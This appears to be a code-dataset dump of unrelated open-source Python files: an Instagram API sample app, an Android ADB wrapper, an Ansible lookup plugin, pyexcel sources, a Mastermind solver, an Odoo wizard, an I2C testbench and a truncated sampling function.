api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
recent_media, next = api.location_recent_media(location_id=514276)
photos = []
for media in recent_media:
photos.append('<img src="%s"/>' % media.get_standard_resolution_url())
content += ''.join(photos)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/media_search')
def media_search():
access_token = request.session['access_token']
content = "<h2>Media Search</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
media_search = api.media_search(lat="37.7808851",lng="-122.3948632",distance=1000)
photos = []
for media in media_search:
photos.append('<img src="%s"/>' % media.get_standard_resolution_url())
content += ''.join(photos)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/media_popular')
def media_popular():
access_token = request.session['access_token']
content = "<h2>Popular Media</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
media_search = api.media_popular()
photos = []
for media in media_search:
photos.append('<img src="%s"/>' % media.get_standard_resolution_url())
content += ''.join(photos)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/user_search')
def user_search():
access_token = request.session['access_token']
content = "<h2>User Search</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
user_search = api.user_search(q="Instagram")
users = []
for user in user_search:
users.append('<li><img src="%s">%s</li>' % (user.profile_picture,user.username))
content += ''.join(users)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/user_follows')
def user_follows():
access_token = request.session['access_token']
content = "<h2>User Follows</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
# 25025320 is http://instagram.com/instagram
user_follows, next = api.user_follows('25025320')
users = []
for user in user_follows:
users.append('<li><img src="%s">%s</li>' % (user.profile_picture,user.username))
while next:
user_follows, next = api.user_follows(with_next_url=next)
for user in user_follows:
users.append('<li><img src="%s">%s</li>' % (user.profile_picture,user.username))
content += ''.join(users)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/location_search')
def location_search():
access_token = request.session['access_token']
content = "<h2>Location Search</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
location_search = api.location_search(lat="37.7808851",lng="-122.3948632",distance=1000)
locations = []
for location in location_search:
locations.append('<li>%s <a href="https://www.google.com/maps/preview/@%s,%s,19z">Map</a> </li>' % (location.name,location.point.latitude,location.point.longitude))
content += ''.join(locations)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/tag_search')
def tag_search():
access_token = request.session['access_token']
content = "<h2>Tag Search</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
tag_search, next_tag = api.tag_search(q="backclimateaction")
tag_recent_media, next = api.tag_recent_media(tag_name=tag_search[0].name)
photos = []
for tag_media in tag_recent_media:
photos.append('<img src="%s"/>' % tag_media.get_standard_resolution_url())
content += ''.join(photos)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/realtime_callback')
@post('/realtime_callback')
def on_realtime_callback():
mode = request.GET.get("hub.mode")
challenge = request.GET.get("hub.challenge")
verify_token = request.GET.get("hub.verify_token")
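    # Subscription handshake: Instagram sends a hub.challenge that must be
    # echoed back; real-time updates arrive without one and are verified
    # against the X-Hub-Signature header instead.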
if challenge:
return challenge
else:
x_hub_signature = request.header.get('X-Hub-Signature')
raw_response = request.body.read()
try:
reactor.process(CONFIG['client_secret'], raw_response, x_hub_signature)
except subscriptions.SubscriptionVerifyError:
print("Signature mismatch")
bottle.run(app=app, host='localhost', port=8515, reloader=True)
| ironman5366/python-instagram | sample_app.py | Python | bsd-3-clause | 11,753 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import subprocess
import time
import os
import re
class AccessDebugBridge(object):
def __init__(self, adbPath="adb", deviceSerial=None, isEmulator=False):
self.adbPath = adbPath
self.deviceSerial = deviceSerial
self.isEmulator = isEmulator
def verifyADB(self):
if self.adbPath != 'adb':
if not os.access(self.adbPath, os.X_OK):
raise Exception("invalid ADB path, or ADB not executable: %s", self.adbPath)
try:
self.checkCmd(["version"])
except os.error as err:
raise Exception(
"unable to execute ADB (%s): ensure Android SDK is installed and ADB is in your $PATH" % err)
except subprocess.CalledProcessError:
raise Exception("unable to execute ADB: ensure Android SDK is installed and ADB is in your $PATH")
def verifyDevice(self):
if self.deviceSerial:
deviceStatus = None
proc = subprocess.Popen([self.adbPath, "devices"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in proc.stdout:
                m = re.match(r'(.+)?\s+(.+)$', line)
if m:
if self.deviceSerial == m.group(1):
deviceStatus = m.group(2)
if deviceStatus is None:
raise Exception("device not found: %s" % self.deviceSerial)
elif deviceStatus != "device":
raise Exception("bad status for device %s: %s" % (self.deviceSerial, deviceStatus))
try:
self.checkCmd(["shell", "echo"])
except subprocess.CalledProcessError:
raise Exception("unable to connect to device: is it plugged in?")
def runCmd(self, args):
finalArgs = [self.adbPath]
if self.deviceSerial:
finalArgs.extend(['-s', self.deviceSerial])
finalArgs.extend(args)
return subprocess.Popen(finalArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def checkCmd(self, args, timeout=None):
finalArgs = [self.adbPath]
if self.deviceSerial:
finalArgs.extend(['-s', self.deviceSerial])
finalArgs.extend(args)
if timeout:
timeout = int(timeout)
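            # Poll the child process once per second and kill it if it has
            # not exited before the timeout elapses.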
proc = subprocess.Popen(finalArgs)
start_time = time.time()
ret_code = proc.poll()
while ((time.time() - start_time) <= timeout) and ret_code is None:
time.sleep(1)
ret_code = proc.poll()
if ret_code is None:
proc.kill()
raise Exception("Timeout exceeded for checkCmd call")
return ret_code
return subprocess.check_call(finalArgs)
def getProcessList(self):
p = self.runCmd(["shell", "ps"])
p.stdout.readline()
proc = p.stdout.readline()
ret = []
while proc:
els = proc.split()
ret.append(list([els[1], els[len(els) - 1], els[0]]))
proc = p.stdout.readline()
return ret
def killProcess(self, appname, forceKill=False):
procs = self.getProcessList()
didKillProcess = False
for (pid, name, user) in procs:
if name == appname:
args = ["shell", "kill"]
if forceKill:
args.append("-9")
args.append(pid)
p = self.runCmd(args)
p.communicate()
if p.returncode == 0:
didKillProcess = True
return didKillProcess
def reboot(self, wait=False):
ret = self.runCmd(["reboot"]).stdout.read()
if not wait:
return ret
return self.checkCmd(["wait-for-device"])
def getCurrentTime(self):
timestr = self.runCmd(["shell", "date", "+%s"]).stdout.read().strip()
if not timestr or not timestr.isdigit():
return None
return str(int(timestr) * 1000)
def getDeviceInformation(self, directive="all"):
ret = {}
if directive == "id" or directive == "all":
ret["id"] = self.runCmd(["get-serialno"]).stdout.read()
if directive == "os" or directive == "all":
ret["os"] = self.runCmd(["shell", "getprop", "ro.build.display.id"]).stdout.read()
if directive == "uptime" or directive == "all":
utime = self.runCmd(["shell", "uptime"]).stdout.read()
if utime:
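                # Parse the output of `adb shell uptime`: the code assumes an
                # 'up time: HH:MM:SS, ...' style line, drops the 9-character
                # prefix and slices out the hours, minutes and seconds.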
utime = utime[9:]
hours = utime[0:utime.find(":")]
utime = utime[utime[1:].find(":") + 2:]
minutes = utime[0:utime.find(":")]
utime = utime[utime[1:].find(":") + 2:]
seconds = utime[0:utime.find(",")]
ret["uptime"] = ["0 days " + hours + " hours " + minutes + " minutes " + seconds + " seconds"]
if directive == "process" or directive == "all":
ret["process"] = self.runCmd(["shell", "ps"]).stdout.read()
if directive == "systime" or directive == "all":
ret["systime"] = self.runCmd(["shell", "date"]).stdout.read()
if directive == "version" or directive == "all":
ret["version"] = self.runCmd(["shell", "cat", "/proc/version"]).stdout.read()
if directive == "cpuinfo" or directive == "all":
ret["cpuinfo"] = self.runCmd(["shell", "cat", "/proc/cpuinfo"]).stdout.read()
if directive == "meminfo" or directive == "all":
ret["meminfo"] = self.runCmd(["shell", "cat", "/proc/meminfo"]).stdout.read()
if directive == "procrank" or directive == "all" and not self.isEmulator:
ret["procrank"] = self.runCmd(["shell", "procrank"]).stdout.read()
if directive == "pstree" or directive == "all" and not self.isEmulator:
ret["pstree"] = self.runCmd(["shell", "pstree"]).stdout.read()
if directive == "bugreport" or directive == "all":
ret["bugreport"] = self.runCmd(["shell", "bugreport"]).stdout.read()
return ret
def makeDeviceReport(self):
dev = self.getDeviceInformation()
hr = '\n# ' + '-' * 80 + '\n\n'
txt = ""
        if 'version' in dev:
            txt += dev.get('version')
            txt += hr
        if 'cpuinfo' in dev:
            txt += dev.get('cpuinfo')
            txt += hr
        if 'meminfo' in dev:
            txt += dev.get('meminfo')
            txt += hr
        if 'procrank' in dev:
            txt += dev.get('procrank')
return txt
def makeBugReport(self):
return self.getDeviceInformation("bugreport")
def getPID(self, procName):
if self.isEmulator:
try:
return int(filter(lambda x: x[1] == procName, self.getProcessList())[0][0])
except IndexError:
return -1
else:
return int(self.runCmd(['shell', 'pidof', procName]).stdout.read())
def getPIDs(self, procName):
try:
processes = filter(lambda x: x[1] == procName, self.getProcessList())
return [int(proc[0]) for proc in processes]
except IndexError:
return -1
def shell(self, command):
commandList = ["shell"]
for eachCommand in command:
commandList.append(eachCommand)
return self.command(commandList)
def command(self, command):
commandList = ["adb"]
for eachCommand in command:
commandList.append(eachCommand)
return subprocess.check_output(commandList).strip("\r\n")
| MozillaSecurity/peach | Peach/Utilities/ADB.py | Python | mpl-2.0 | 7,772 |
"""
DOCUMENTATION:
lookup: every
version_added: "QB-0.1.61"
short_description: Returns true for a key every X time delta (per host).
description:
- Returns `True` if more than a specified amount of time has passed
since it last returned `True` for that key for the current
`inventory_hostname` fact.
If it's never returned `True` for the `key` / `inventory_hostname`
combo it will.
This is useful to control updating - things like "run
`apt-get update` if it doesn't look like it's been run in a day",
etcetera.
** WARNING: NOT AT ALL THREAD / CONCURRENCY SAFE **
          This is meant for things that you'd *rather not* have run too
          often; it is not intended for and should not be used for
controlling stuff that *must not* be run more than a certain
frequency because it's a shit-simple implementation with
**NO LOCKING / CONCURRENCY SUPPORT** so if another thread or
process is trying to do the same thing at the same time they will
potentially both return `True` or who really knows what else.
Data is stored at `~/.ansible/qb/data/every.yml`. This should
          probably be configurable, but for the moment it will do.
options:
key:
description:
- Required single positional argument, used as the key to
store / retrieve data.
required: True
**kwargs:
description:
- Accepts all the Python `datetime.timedelta` constructor
keywords. Requires at least one.
You can set the delta to zero (so it returns True every
call) by providing `days=0` or similar (useful to test
stuff out maybe).
required: True
EXAMPLES:
- name: Install Yarn via Homebrew, updating Homebrew at most once per day
homebrew:
name: yarn
update_homebrew: "{{ lookup('every', 'update_homebrew' days=1) }}"
RETURN:
`True` if it's been more than the provided period since the lookup returned
`True` last for this key /
"""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.errors import AnsibleError
from ansible.plugins.lookup import LookupBase
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
from datetime import datetime, timedelta
import os
import errno
import yaml
def mkdir_p(path):
"""
Can't believe Python doesn't have this built-in...
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class LookupModule(LookupBase):
def run(self, terms, variables=None, **kwargs):
# Check args
if len(terms) != 1:
raise AnsibleError(
"Requires exacty one positional argument (key)."
)
if len(kwargs) == 0:
raise AnsibleError(
"Requires at least one Python timedelta keyword arg."
)
# Setup variables
key = terms[0]
host = variables['inventory_hostname']
data_path = os.path.join(
variables['ansible_env']['HOME'],
'.ansible',
'qb',
'data',
'every.yml'
)
delta = timedelta(**kwargs)
now = datetime.now()
# Default to empty data
data = {}
# No idea how / where to see this output...
# display.debug("Seeing if %s has been done in last %s" % (key, delta))
# Ensure the data directory exists
mkdir_p(os.path.dirname(data_path))
# Read the data file, overwriting `data` var (if file it exists)
try:
with open(data_path, 'r') as f:
data = yaml.safe_load(f)
except IOError as error:
pass
# If there's no entry for this host default to empty dict
if host not in data:
data[host] = {}
# Default `should` (our return value) to True: if it's never returned
# `True` it will now.
should = True
# If we have `data[host][key]['last']`, see if's been at least `delta`
# and set `should`
if key in data[host]:
if 'last' in data[host][key]:
should = (now - delta) >= data[host][key]['last']
else:
# Create a new dict at `data[host][key]` so we can write `now` to
# it
data[host][key] = {}
# If we're gonna return `True`, set `last` to `now` and write back
# to the path.
#
# WARNING Not at all thread / concurrency safe!
if should:
data[host][key]['last'] = now
with open(data_path, 'w') as f:
yaml.safe_dump(data, f, default_flow_style=False)
# And return our result
return should
| nrser/qb | plugins/lookup/every_lookups.py | Python | mit | 5,413 |
"""
pyexcel.plugins.sources.sqlalchemy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Representation of sqlalchemy sources
:copyright: (c) 2015-2020 by Onni Software Ltd.
:license: New BSD License
"""
from pyexcel_io.constants import DB_SQL
from .db_sources import BookDbSource, SheetDbSource
class SheetSQLAlchemySource(SheetDbSource):
"""
SQLAlchemy channeled sql database as data source
"""
def __init__(
self, session, table, export_columns=None, sheet_name=None, **keywords
):
self.__session = session
self.__table = table
SheetDbSource.__init__(
self,
DB_SQL,
export_columns=export_columns,
sheet_name=sheet_name,
**keywords
)
def get_export_params(self):
return (self.__session, [self.__table])
def get_import_params(self):
return (self.__session, self.__table)
class BookSQLSource(BookDbSource):
"""
SQLAlchemy bridged multiple table data source
"""
def __init__(self, session, tables, **keywords):
self.__session = session
self.__tables = tables
BookDbSource.__init__(self, DB_SQL, **keywords)
def get_params(self):
return (self.__session, self.__tables)
| chfw/pyexcel | pyexcel/plugins/sources/sqlalchemy.py | Python | bsd-3-clause | 1,279 |
import itertools
class mind:
"""
Třída řešící hru Mastermind ve třech úrovních obtížnosti.
Podporované módy:
1) Hádání 4 pozic se 6 barvami
2) Hádání 5 pozic s 7 barvami
3) Hádání 6 pozic s 8 barvami
O zadání, učování správného řešení a ohodnocování jednotlivých tahů
se stará třída master.
V prvním kole se pro každý herní mód využije pevně danný tah. Ten by
měl pro další kola vyloučit co nejvyšší množství "potencíálních"
řešení.
Po ohodnocení prvního kola (zajišťuje master), jsou z množiny všech
možných řešení dané úlohy vyloučeny ty nesprávné. Tedy ty, pro
které by (pokud by byly hledaným řešením úlohy) nemohl naposledy
hraný tah získat stejné ohodnocení, které dostal.
Postup se opakuje, dokud není množina všech řešení dostatečně malá
(moemntálně pod 1000 prvků). Zde přichází do hry výběr nejlepšího
dalšího tahu. Za ten je považován tah, který je nejvíce podobný
ostatním (má nejvyšší součetsoučtu vůči ostatním nejvyšší skóre).
"""
def __init__(self):
        # Code name
        self.codename = "up to 32 characters"
        # Game mode - holds 4 (4 out of 6), 5 (5 out of 7) or 6 (6 out of 8)
        self.game_mode = 0
        # Set of all possible solutions of the current task
        self.possibilities = set()
        # Is this the first guess?
        self.first_guess = True
        # Score of the last attempted solution
        self.last_score = 0
        # Cache of the mutual scores of pairs of candidates
        self.cache = {}
def init(self, numbers, positions):
"""
Metoda volaná po každé změně obtížnosti (herního typu), aby se
nastavilo vše potřebné.
Parametry:
----------
numbers:integer
Počet číslic, které mohou být na jedné pozici v rozsahu
0... numbers-1
positions:integer
Počet pozic.
"""
self.game_mode = positions
self.possibilities = set(itertools.product(range(numbers), repeat=positions))
self.first_guess = True
self.cache = {}
def pick_best_guess(self):
"""
Metoda, jenž se pokusí o nalezení nejlepšího dalšího tahu.
Protože je relativně pomalá (porovnává prvky v poli řešení
každý s každým), měla by se volat až když je pole řešení
menší.
Vrací:
------
set
Nejlepší možný tah.
"""
best = {}
if len(self.possibilities) == 1:
return self.possibilities.pop()
# Kontroluje každý s každým
for guess in self.possibilities:
for compare in self.possibilities:
# Samo se sebou neporovnává
if guess == compare:
continue
# Vytvoří počítadlo
if not guess in best:
best[guess] = 0
# Přičte vzájemné skóre k počítadlu.
best[guess] += self.get_score( guess, compare)
# Vrátí tah s nejvyšším součtem všech skóre
return max(best, key=lambda key: best[key])
def count_matching_colors(self, a, b):
"""
Spočítá počet stejných barev (na různých pozicích) v řešení a
a b.
Parametry:
---------
a:set
Řešení A
b:set
Řešení B
Vrací:
------
integer
Počet stejných barev.
"""
count = 0
a_iterator = iter(sorted(a))
b_iterator = iter(sorted(b))
a_value = next(a_iterator)
b_value = next(b_iterator)
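        # Merge-walk both sorted colour sequences; whenever the current values
        # match, count one shared colour and advance both iterators.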
try:
while True:
if a_value == b_value:
count += 1
a_value = next(a_iterator)
b_value = next(b_iterator)
elif a_value < b_value:
a_value = next(a_iterator)
else:
b_value = next(b_iterator)
except StopIteration:
return count
def get_score( self, guess, compare):
"""
Metoda vracející vzájemné ohodnocení dvou možných řešení.
Parametry:
----------
guess:set
Řešení A
compare:set
Řešení B
"""
# Prohledávání cache, zda jsme to už nepočítali.
# Bohužel mě nenapadlo jak vytvořit unikátní klíč
# na základě parametrů guess a compare tak, aby
# nezáleželo na jejich pořadí.
#
# Memoize by asi moc nepomohlo...
a = guess + compare
b = compare + guess
if a in self.cache:
return self.cache[a]
elif b in self.cache:
return self.cache[b]
        # Compute the score: 10 points per black peg plus 1 per white peg
key = a
blacks = sum(1 for a, b in zip(guess, compare) if a == b)
color_matches = self.count_matching_colors(guess, compare)
whites = color_matches - blacks
        # Store the result in the cache
self.cache[key] = blacks * 10 + whites
return blacks * 10 + whites
def guess(self):
guess = 0
if self.first_guess:
self.first_guess = False
if self.game_mode == 4:
guess = (0, 0, 1, 1)
elif self.game_mode == 5:
guess = (0, 0, 1, 1, 2)
elif self.game_mode == 6:
guess = (0, 0, 1, 1, 2, 2)
self.possibilities.remove(guess)
        # Time to look for the best next guess
        # This did not prove worthwhile
"""
if len(self.possibilities) < 1000:
guess = self.pick_best_guess()
else:
"""
guess = self.possibilities.pop()
return guess
def eval(self, guess, black, white):
self.last_score = black * 10 + white
        # Remove all candidates that can no longer be the solution
self.possibilities = set(filter(
lambda n: self.get_score(guess,n) == self.last_score,
self.possibilities
)) | malja/cvut-python | cviceni10/mind.py | Python | mit | 6,473 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <[email protected]>
#
# The licence is in the file __openerp__.py
#
##############################################################################
from openerp.osv import orm, fields
from openerp.tools.translate import _
class account_analytic_attribution_wizard(orm.TransientModel):
"""Wizard for performing attribution of analytic lines into
other analytic accounts."""
_name = 'account.analytic.attribution.wizard'
_columns = {
'period_id': fields.many2one(
'account.period', _('Period')),
'fiscalyear_id': fields.many2one(
'account.fiscalyear', _('Fiscal year'))
}
def perform_attribution(self, cr, uid, ids, context=None):
""" Perform analytic attributions. """
if isinstance(ids, list):
# Only one wizard at a time
ids = ids[0]
wizard = self.browse(cr, uid, ids, context)
periods = list()
if context.get('active_model') == 'account.period':
periods = self.pool.get('account.period').browse(
cr, uid, context.get('active_ids'), context)
fiscalyear = wizard.fiscalyear_id
if fiscalyear:
if fiscalyear.state == 'draft':
periods = fiscalyear.period_ids
elif fiscalyear.state == 'done':
raise orm.except_orm(
_("Fiscal Year closed"),
_("You cannot perform the computation on "
"closed fiscal year."))
elif wizard.period_id:
periods = [wizard.period_id]
# Get the attribution analytic journal and root analytic account
data_obj = self.pool.get('ir.model.data')
journal_id = data_obj.get_object_reference(
cr, uid, 'account_analytic_attribution',
'journal_attribution')[1]
attribution_analytic_id = data_obj.get_object_reference(
cr, uid, 'account_analytic_attribution',
'account_analytic_root_to_attribute')[1]
analytic_line_obj = self.pool.get('account.analytic.line')
analytic_default_obj = self.pool.get('account.analytic.default')
generated_lines = list()
for period in periods:
if period.state == 'closed':
# Skip closed periods
continue
# Remove old attributions for avoiding duplicates
old_line_ids = analytic_line_obj.search(cr, uid, [
('journal_id', '=', journal_id),
('date', '>=', period.date_start),
('date', '<=', period.date_stop)], context=context)
analytic_line_obj.unlink(cr, uid, old_line_ids, context)
# Perform the attribution for each analytic line below attribution
# center (root analytic account)
line_ids = analytic_line_obj.search(cr, uid, [
('account_id', 'child_of', attribution_analytic_id),
('date', '>=', period.date_start),
('date', '<=', period.date_stop)], context=context)
generated_lines.extend(analytic_default_obj.perform_attribution(
cr, uid, line_ids, journal_id, period.date_start,
period.date_stop, context))
return {
'name': _('Generated Analytic Lines'),
'view_mode': 'tree,form',
'view_type': 'form',
'res_model': 'account.analytic.line',
'domain': [('id', 'in', generated_lines)],
'context': {'group_by': ['ref', 'date']},
'type': 'ir.actions.act_window',
}
| ndtran/compassion-accounting | account_analytic_attribution/wizard/account_analytic_attribution_wizard.py | Python | agpl-3.0 | 3,945 |
#!/usr/bin/env python
"""
Copyright (c) 2015-2017 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from myhdl import *
import os
import axis_ep
module = 'i2c_init'
testbench = 'test_%s' % module
srcs = []
srcs.append("../rtl/%s.v" % module)
srcs.append("%s.v" % testbench)
src = ' '.join(srcs)
build_cmd = "iverilog -o %s.vvp %s" % (testbench, src)
def bench():
# Parameters
# Inputs
clk = Signal(bool(0))
rst = Signal(bool(0))
current_test = Signal(intbv(0)[8:])
m_axis_cmd_ready = Signal(bool(0))
m_axis_data_tready = Signal(bool(0))
start = Signal(bool(0))
# Outputs
m_axis_cmd_address = Signal(intbv(0)[7:])
m_axis_cmd_start = Signal(bool(0))
m_axis_cmd_read = Signal(bool(0))
m_axis_cmd_write = Signal(bool(0))
m_axis_cmd_write_multiple = Signal(bool(0))
m_axis_cmd_stop = Signal(bool(0))
m_axis_cmd_valid = Signal(bool(0))
m_axis_data_tdata = Signal(intbv(0)[8:])
m_axis_data_tvalid = Signal(bool(0))
m_axis_data_tlast = Signal(bool(1))
busy = Signal(bool(0))
# sources and sinks
cmd_sink_pause = Signal(bool(0))
data_sink_pause = Signal(bool(0))
cmd_sink = axis_ep.AXIStreamSink()
cmd_sink_logic = cmd_sink.create_logic(
clk,
rst,
tdata=(m_axis_cmd_address, m_axis_cmd_start, m_axis_cmd_read, m_axis_cmd_write, m_axis_cmd_write_multiple, m_axis_cmd_stop),
tvalid=m_axis_cmd_valid,
tready=m_axis_cmd_ready,
pause=cmd_sink_pause,
name='cmd_sink'
)
data_sink = axis_ep.AXIStreamSink()
data_sink_logic = data_sink.create_logic(
clk,
rst,
tdata=m_axis_data_tdata,
tvalid=m_axis_data_tvalid,
tready=m_axis_data_tready,
tlast=m_axis_data_tlast,
pause=data_sink_pause,
name='data_sink'
)
# DUT
if os.system(build_cmd):
raise Exception("Error running build command")
dut = Cosimulation(
"vvp -m myhdl %s.vvp -lxt2" % testbench,
clk=clk,
rst=rst,
current_test=current_test,
m_axis_cmd_address=m_axis_cmd_address,
m_axis_cmd_start=m_axis_cmd_start,
m_axis_cmd_read=m_axis_cmd_read,
m_axis_cmd_write=m_axis_cmd_write,
m_axis_cmd_write_multiple=m_axis_cmd_write_multiple,
m_axis_cmd_stop=m_axis_cmd_stop,
m_axis_cmd_valid=m_axis_cmd_valid,
m_axis_cmd_ready=m_axis_cmd_ready,
m_axis_data_tdata=m_axis_data_tdata,
m_axis_data_tvalid=m_axis_data_tvalid,
m_axis_data_tready=m_axis_data_tready,
m_axis_data_tlast=m_axis_data_tlast,
busy=busy,
start=start
)
@always(delay(4))
def clkgen():
clk.next = not clk
@instance
def check():
yield delay(100)
yield clk.posedge
rst.next = 1
yield clk.posedge
rst.next = 0
yield clk.posedge
yield delay(100)
yield clk.posedge
# testbench stimulus
yield clk.posedge
print("test 1: run, no delays")
current_test.next = 1
start.next = 1
yield clk.posedge
start.next = 0
yield clk.posedge
yield clk.posedge
while busy:
yield clk.posedge
# addresses and data for checking
addr = [0x50, 0x50, 0x51, 0x52, 0x53]
data = [0x00, 0x04, 0x11, 0x22, 0x33, 0x44]
# check all issued commands
for a in addr:
first = True
for d in data:
f1 = cmd_sink.recv()
f2 = data_sink.recv()
assert f1.data[0][0] == a # address
assert f1.data[0][1] == first # start
assert f1.data[0][2] == 0 # read
assert f1.data[0][3] == 1 # write
assert f1.data[0][4] == 0 # write multiple
assert f1.data[0][5] == 0 # stop
assert f2.data[0] == d
first = False
# check for stop command
f1 = cmd_sink.recv()
assert f1.data[0][1] == 0 # start
assert f1.data[0][2] == 0 # read
assert f1.data[0][3] == 0 # write
assert f1.data[0][4] == 0 # write multiple
assert f1.data[0][5] == 1 # stop
# make sure we got everything
assert cmd_sink.empty()
assert data_sink.empty()
yield delay(100)
# testbench stimulus
yield clk.posedge
print("test 2: run with delays")
current_test.next = 2
start.next = 1
yield clk.posedge
start.next = 0
yield clk.posedge
yield clk.posedge
cmd_sink_pause.next = 0
data_sink_pause.next = 1
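        # While the module is busy, toggle the command and data sink pause
        # signals to exercise backpressure in different combinations.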
while busy:
yield delay(100)
yield clk.posedge
cmd_sink_pause.next = 0
data_sink_pause.next = 1
yield clk.posedge
cmd_sink_pause.next = 1
data_sink_pause.next = 1
yield delay(100)
yield clk.posedge
cmd_sink_pause.next = 1
data_sink_pause.next = 0
yield clk.posedge
cmd_sink_pause.next = 1
data_sink_pause.next = 1
cmd_sink_pause.next = 0
data_sink_pause.next = 0
# addresses and data for checking
addr = [0x50, 0x50, 0x51, 0x52, 0x53]
data = [0x00, 0x04, 0x11, 0x22, 0x33, 0x44]
# check all issued commands
for a in addr:
first = True
for d in data:
f1 = cmd_sink.recv()
f2 = data_sink.recv()
assert f1.data[0][0] == a # address
assert f1.data[0][1] == first # start
assert f1.data[0][2] == 0 # read
assert f1.data[0][3] == 1 # write
assert f1.data[0][4] == 0 # write multiple
assert f1.data[0][5] == 0 # stop
assert f2.data[0] == d
first = False
# check for stop command
f1 = cmd_sink.recv()
assert f1.data[0][1] == 0 # start
assert f1.data[0][2] == 0 # read
assert f1.data[0][3] == 0 # write
assert f1.data[0][4] == 0 # write multiple
assert f1.data[0][5] == 1 # stop
# make sure we got everything
assert cmd_sink.empty()
assert data_sink.empty()
yield delay(100)
raise StopSimulation
return instances()
def test_bench():
sim = Simulation(bench())
sim.run()
if __name__ == '__main__':
print("Running test...")
test_bench()
| alexforencich/verilog-i2c | tb/test_i2c_init.py | Python | mit | 7,603 |
import os.path
def thumbnails_path(name):
if name is None:
return os.path.join(os.path.dirname(__file__), 'thumbnails')
return os.path.join(os.path.dirname(__file__), 'thumbnails', name)
| relekang/thumbnails.lkng.me | helpers.py | Python | mit | 205 |
import logging
from pathlib import Path
import time
from dstools.pipeline.tasks import PythonCallable
from dstools.pipeline.products import File
from dstools.pipeline import DAG
logging.basicConfig(level=logging.INFO)
def wait(product):
time.sleep(1)
Path(str(product)).touch()
def wait2(product, upstream):
time.sleep(1)
Path(str(product)).touch()
dag = DAG()
t1 = PythonCallable(wait, File('t1'), dag, name='t1')
t2 = PythonCallable(wait, File('t2'), dag, name='t2')
t3 = PythonCallable(wait, File('t3'), dag, name='t3')
t4 = PythonCallable(wait2, File('t4'), dag, name='t4')
t5 = PythonCallable(wait2, File('t5'), dag, name='t5')
t6 = PythonCallable(wait2, File('t6'), dag, name='t6')
t7 = PythonCallable(wait2, File('t7'), dag, name='t7')
(t1 + t2 + t3) >> t4 >> (t5 + t6) >> t7
dag.build(force=True)
| edublancas/python-ds-tools | profiling/pipeline.py | Python | mit | 833 |
import sklearn
import pandas as pd
import numpy as np
from time import gmtime, strftime
from feature_engineer import timer
nrs = np.random.RandomState(0)
def lcc_sample(labels, preds, input_data, C = 1):
"""
Param:
labels shape: (n_sample,)
preds shape: (n_sample,)
input_data shape: (n_sample, feature_dim)
C: times based on accepte_rate
return:
data after sampling
"""
accept_rate = np.abs(labels - preds) * C
bernoulli_z = nrs.binomial(1, np.clip(accept_rate, 0, 1))
select_ind = [i for i in range(bernoulli_z.shape[0]) if bernoulli_z[i] == 1]
sample_data = input_data[select_ind, :]
sample_labels = labels[select_ind]
weight = np.ones(len(labels))
adjust_weight_ind = [i for i in range(len(accept_rate)) if accept_rate[i] > 1]
weight[adjust_weight_ind] = accept_rate[adjust_weight_ind]
weight = weight[select_ind]
